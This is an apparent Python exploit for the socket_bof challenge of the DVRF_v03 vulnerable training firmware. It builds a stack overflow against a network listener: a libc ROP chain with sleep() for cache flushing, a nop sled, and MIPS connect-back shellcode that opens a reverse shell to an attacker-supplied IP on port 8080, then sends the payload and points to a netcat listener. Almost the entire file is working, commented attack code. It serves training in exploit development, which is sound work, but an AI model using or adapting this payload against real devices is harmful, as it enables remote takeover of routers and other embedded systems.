import base64
import socket
import string
import struct
import sys
import time
from getopt import getopt as GetOpt, GetoptError
def usage():
    """Print the command-line help for this exploit and exit with status 1.

    The tool targets the socket_bof challenge of the DVRF_v03 training
    firmware.  Note that the connect-back *port* is not an option: the
    shellcode assembled later in this file hard-codes 8080, so the listener
    referred to by ``-s`` has to be bound to that port.
    """
    prog = sys.argv[0]
    help_lines = [
        "",
        "Socket_bof solution for DVRF_v03",
        "By: Elvis Collado [b1ack0wl]",
        "",
        "Usage: %s -s source.ip -d dst.ip -p dst.port" % prog,
        "",
        "\t-s Connect back IP",
        "\t-d Destination IP of Socket Listener",
        "\t-p Destination Port that socket_bof is listening on",
        "\t-h Print this Help Menu",
        "",
    ]
    for text in help_lines:
        print(text)
    sys.exit(1)
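def _pack_ip(dotted):
    """Return the four octets of *dotted* as a list of four packed bytes.

    Args:
        dotted: IPv4 address in dotted-quad form, e.g. "192.168.1.10".

    Returns:
        [IP_1, IP_2, IP_3, IP_4] -- each octet packed with struct "<B", in
        the order the shellcode splices them into its lui/ori pair.

    Raises:
        ValueError: for anything other than four numeric octets in 1..255.
            A 0 octet is refused on purpose: every other byte of the payload
            is kept NUL-free, presumably because the overflow stops at the
            first NUL, so this keeps the original "IP cannot have NULL Bytes"
            rule while also catching junk that used to escape as a traceback
            from int() or struct.pack().
    """
    octets = dotted.split(".")
    if len(octets) != 4:
        raise ValueError("IP must be a dotted quad: %r" % dotted)
    packed = []
    for octet in octets:
        try:
            value = int(octet)
        except ValueError:
            raise ValueError("IP octet is not a number: %r" % octet)
        if not 0 <= value <= 255:
            raise ValueError("IP octet out of range: %r" % octet)
        if value == 0:
            raise ValueError("IP cannot have NULL Bytes :(")
        packed.append(struct.pack("<B", value))
    return packed


# All three settings are mandatory.  They are pre-set to None so a missing
# option is reported through usage() instead of a NameError much later when
# the shellcode or the socket code first touches the variable.
host = None
port = None
IP_1 = IP_2 = IP_3 = IP_4 = None
try:
    (opts, args) = GetOpt(sys.argv[1:], 's:d:p:h')
except GetoptError:
    usage()
for opt, arg in opts:
    if opt == "-s":
        try:
            IP_1, IP_2, IP_3, IP_4 = _pack_ip(arg)
        except ValueError as err:
            print(err)
            sys.exit(1)
    elif opt == "-d":
        host = arg
    elif opt == "-p":
        try:
            port = int(arg)
        except ValueError:
            print("Port must be a number: %r" % arg)
            sys.exit(1)
        if not 1 <= port <= 65535:
            print("Port out of range: %d" % port)
            sys.exit(1)
    elif opt == "-h":
        # Previously fell through to `continue`, so -h never printed the
        # help the text promises.
        usage()
if host is None or port is None or IP_1 is None:
    usage()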
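try:
    # create an AF_INET, STREAM socket (TCP)
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
except socket.error as msg:
    # socket.error carries errno/strerror as attributes; the old msg[0]/msg[1]
    # indexing only worked on the tuple-style exception of old interpreters.
    print('Failed to create socket. Error code: ' + str(msg.errno) + ' , Error message : ' + str(msg.strerror))
    sys.exit()
try:
    remote_ip = socket.gethostbyname(host)
except socket.gaierror:
    # could not resolve
    print('Hostname could not be resolved. Exiting')
    sys.exit()
# Connect to the vulnerable listener.  A refused or silently dropped
# connection used to surface as a raw traceback from connect(); bound the
# wait, report it and exit non-zero instead.  Blocking mode is restored
# afterwards so the later sendall() behaves exactly as before.
s.settimeout(10)
try:
    s.connect((remote_ip, port))
except socket.error as msg:
    print('Could not connect to %s:%d - %s' % (remote_ip, port, msg))
    s.close()
    sys.exit(1)
s.settimeout(None)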
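# Shellcode From bowcaster: MIPS (little-endian) Linux connect-back shell.
#
# Flow, by syscall number (o32 = 4000 + n):
#   4183 socket(2, 2, 0)                  -> fd saved at -1(sp)
#   4170 connect(fd, &sockaddr_in, 16)    -> sockaddr built at -30(sp):
#        02 00 = AF_INET, 1f 90 = htons(8080), then the four IP octets
#   4063 dup2(fd, n) for n = 2, 1, 0      -> the bne loop on t7
#   4011 execve("//bin/sh", ["//bin/sh", NULL], NULL)
#
# Every instruction is encoded without a 0x00 byte (e.g. "syscall 0x40404"
# is a syscall whose code field is simply non-zero); that is why the
# connect-back IP may not contain a 0 octet.
#
# The connect-back port is FIXED at 8080.  To change it, replace both
# 0x901f immediates: the value is the port in network byte order read as a
# little-endian halfword, i.e. ((port & 0xff) << 8) | (port >> 8)
# (8080 = 0x1f90 -> 0x901f), and both bytes must be non-zero.
#
# The IP octets are spliced as the low/high bytes of the lui and ori
# immediates: lui takes (IP_4 << 8) | IP_3, ori takes (IP_2 << 8) | IP_1,
# so the word stored at -26(sp) reads IP_1 IP_2 IP_3 IP_4 in memory, which
# is sin_addr in network order.
shellcode = b"".join([
    b"\xfa\xff\x0f\x24",  # li t7,-6
    b"\x27\x78\xe0\x01",  # nor t7,t7,zero          ; t7 = 5
    b"\xfd\xff\xe4\x21",  # addi a0,t7,-3           ; AF_INET
    b"\xfd\xff\xe5\x21",  # addi a1,t7,-3           ; SOCK_STREAM
    b"\xff\xff\x06\x28",  # slti a2,zero,-1         ; 0
    b"\x57\x10\x02\x24",  # li v0,4183              ; socket
    b"\x0c\x01\x01\x01",  # syscall 0x40404
    b"\xff\xff\xa2\xaf",  # sw v0,-1(sp)            ; stash the fd
    b"\xff\xff\xa4\x8f",  # lw a0,-1(sp)
    b"\xfd\xff\x0f\x3c",  # lui t7,0xfffd
    b"\x27\x78\xe0\x01",  # nor t7,t7,zero          ; 0x0002ffff
    b"\xe0\xff\xaf\xaf",  # sw t7,-32(sp)           ; sin_family = 2 lands at -30(sp)
    # Connect back port 8080
    b"\x1f\x90\x0e\x3c",  # lui t6,0x901f
    b"\x1f\x90\xce\x35",  # ori t6,t6,0x901f
    b"\xe4\xff\xae\xaf",  # sw t6,-28(sp)           ; sin_port
    # IP Address
    IP_3 + IP_4 + b"\x0e\x3c",  # lui t6,<ip>
    IP_1 + IP_2 + b"\xce\x35",  # ori t6,t6,<ip>
    b"\xe6\xff\xae\xaf",  # sw t6,-26(sp)           ; sin_addr
    b"\xe2\xff\xa5\x27",  # addiu a1,sp,-30         ; &sockaddr_in
    b"\xef\xff\x0c\x24",  # li t4,-17
    b"\x27\x30\x80\x01",  # nor a2,t4,zero          ; 16 = sizeof(sockaddr_in)
    b"\x4a\x10\x02\x24",  # li v0,4170              ; connect
    b"\x0c\x01\x01\x01",  # syscall 0x40404
    b"\xfd\xff\x0f\x24",  # li t7,-3
    b"\x27\x78\xe0\x01",  # nor t7,t7,zero          ; t7 = 2
    b"\xff\xff\xa4\x8f",  # lw a0,-1(sp)            ; <dup2_loop>
    b"\x21\x28\xe0\x01",  # move a1,t7
    b"\xdf\x0f\x02\x24",  # li v0,4063              ; dup2
    b"\x0c\x01\x01\x01",  # syscall 0x40404
    b"\xff\xff\x10\x24",  # li s0,-1
    b"\xff\xff\xef\x21",  # addi t7,t7,-1
    b"\xfa\xff\xf0\x15",  # bne t7,s0,68 <dup2_loop>
    b"\xff\xff\x06\x28",  # slti a2,zero,-1         ; envp = NULL (delay slot)
    b"\x62\x69\x0f\x3c",  # lui t7,0x6962
    b"\x2f\x2f\xef\x35",  # ori t7,t7,0x2f2f        ; "//bi"
    b"\xec\xff\xaf\xaf",  # sw t7,-20(sp)
    b"\x73\x68\x0e\x3c",  # lui t6,0x6873
    b"\x6e\x2f\xce\x35",  # ori t6,t6,0x2f6e        ; "n/sh"
    b"\xf0\xff\xae\xaf",  # sw t6,-16(sp)
    b"\xf4\xff\xa0\xaf",  # sw zero,-12(sp)         ; NUL terminator
    b"\xec\xff\xa4\x27",  # addiu a0,sp,-20         ; path
    b"\xf8\xff\xa4\xaf",  # sw a0,-8(sp)            ; argv[0]
    b"\xfc\xff\xa0\xaf",  # sw zero,-4(sp)          ; argv[1] = NULL
    b"\xf8\xff\xa5\x27",  # addiu a1,sp,-8          ; argv
    b"\xab\x0f\x02\x24",  # li v0,4011              ; execve
    b"\x0c\x01\x01\x01",  # syscall 0x40404
])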
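# libraries and offsets
#
# Two libc load addresses have been observed for this target: under qemu
# sleep() sits at 0x767142b0, on the real device at 0x2ab6d2b0.  Both are
# the same libc (identical gadget offsets); only the base moves.  The
# exploit assumes that base is fixed for the run (no ASLR, or a base
# recovered some other way) -- confirm it against the target before firing,
# and re-check that every base+offset below stays NUL-free, since the
# payload is delivered through a NUL-terminated copy.
LIBC_BASES = {
    "device": 0x2ab3e000,  # sleep = 0x2ab6d2b0
    "qemu": 0x766e5000,    # sleep = 0x767142b0
}
libc = LIBC_BASES["device"]  # switch to "qemu" when running in the emulator
sleep_offset = 0x0002f2b0  # libc sleep(); called via gadget 2 before the stack is executed
rop1_offset = 0x000377cc   # lw ra,0x30(sp); lw s1,0x2c(sp); lw s0,0x28(sp); jr ra  -- loads s0 and s1
rop2_offset = 0x000189ec   # move t9,s0; jalr t9; addiu a1,zero,1 (delay slot)      -- calls s0
rop3_offset = 0x00033d8c   # addiu a1,sp,0x18; lw gp,0x10(sp); lw ra,0x48(sp); jr ra -- sp+0x18 into a1
rop4_offset = 0x0001fbcc   # move t9,a1; addiu a0,a0,0x38; jr t9                     -- jump to a1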
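# Craft Exploit
#
# Gadget chain (libc disassembly, offsets defined above):
#   Gadget 1 @ rop1_offset
#     0x000377cc  lw ra, 0x30(sp)
#     0x000377d0  lw s1, 0x2c(sp)
#     0x000377d4  lw s0, 0x28(sp)
#     0x000377d8  jr ra
#   Gadget 2 @ rop2_offset   (calls s0 = sleep; a1 := 1 in the delay slot,
#                              a0 is whatever the overflowed function left)
#     0x000189ec  move t9, s0
#     0x000189f0  jalr t9
#     0x000189f4  addiu a1, zero, 1
#     0x000189f8  b 0x18a04
#   Gadget 3 @ rop3_offset   (a1 := sp + 0x18, ra := [sp + 0x48])
#     0x00033d8c  addiu a1, sp, 0x18
#     0x00033d90  lw gp, 0x10(sp)
#     0x00033d94  lw ra, 0x48(sp)
#     0x00033d98  jr ra
#   Gadget 4 @ rop4_offset   (jump to a1, i.e. into the stack buffer)
#     0x0001fbcc  move t9, a1
#     0x0001fbd0  addiu a0, a0, 0x38
#     0x0001fbd4  jr t9
#
# The sleep() detour is the usual MIPS trick for getting stack-written code
# out of the data cache before it is fetched as instructions (hence "check
# your listener in about 5 seconds"); the padding between gadget 2's return
# and gadget 3 depends on the epilogue of the function that contains
# gadget 2, which is not reproduced here.
#
# Everything appended here must stay NUL-free: the xor s5,s5,s5 words are a
# NUL-free nop sled, and the ROP addresses are NUL-free for the libc base
# chosen above.
message = b"A" * 51                                  # Padding up to the saved return address
message += struct.pack("<L", libc + rop1_offset)    # RA rop1
message += b"B" * 40                                # padding for lw offset
# Gadget 2 - sleep
message += struct.pack("<L", libc + sleep_offset)   # s0 0x28 -> sleep()
message += b"MMMM"                                  # s1 0x2c (unused)
message += struct.pack("<L", libc + rop2_offset)    # ra 0x30 -> gadget 2
# Gadget 3
message += b"C" * 60
message += b"0" * 4                                 # s0
message += b"1" * 4                                 # s1
message += b"2" * 4                                 # s2
message += b"3" * 4                                 # s3
message += b"4" * 4                                 # s4
message += struct.pack("<L", libc + rop3_offset)    # RA -> gadget 3
# Gadget 4
# 24 bytes of filler: with sp at the first 'D' when gadget 3 runs, sp+0x18
# is the xor below (loaded into a1) and sp+0x48 is the rop4 word
# (24 + 4*4 + 8*4 = 72 = 0x48), which gadget 3 loads into ra.
message += b"D" * (72 - 48)
# From here on the words are executed as instructions once gadget 4 jumps
# to a1.
message += struct.pack("<L", 0x02108026)            # xor s0, s0, s0      ; s0 = 0
message += struct.pack("<L", 0x02b5a826)            # xor s5, s5, s5      ; nop
message += struct.pack("<L", 0x02b5a826)            # xor s5, s5, s5      ; nop
message += struct.pack("<L", 0xafb0fff8)            # sw s0, -8(sp)       ; zero word at -8(sp)
# nop sled to the shellcode
message += struct.pack("<L", 0x02b5a826) * 8        # xor s5, s5, s5
# This word is both the ra gadget 3 loads (-> gadget 4) AND part of the
# sled's instruction stream, so it is executed before the shellcode: with
# the device base it is 0x2ab5dbcc, opcode 0x0a (slti), harmless.  When
# changing libc, make sure the new value still decodes to something benign.
message += struct.pack("<L", libc + rop4_offset)    # RA -> gadget 4
message += struct.pack("<L", 0xafa0fffc)            # sw zero, -4(sp)     ; rt field is $zero, not s0
message += shellcode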
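try:
    # Set the whole string; sendall() loops until every byte is out.
    s.sendall(message)
except socket.error as err:
    # Send failed -- say why, and exit non-zero so a wrapper can tell.
    print('Send failed')
    print(err)
    sys.exit(1)
finally:
    # Close on every path; the old code leaked the socket on failure.
    s.close()
print('Exploit Sent - Check your netcat listener in about 5 seconds.')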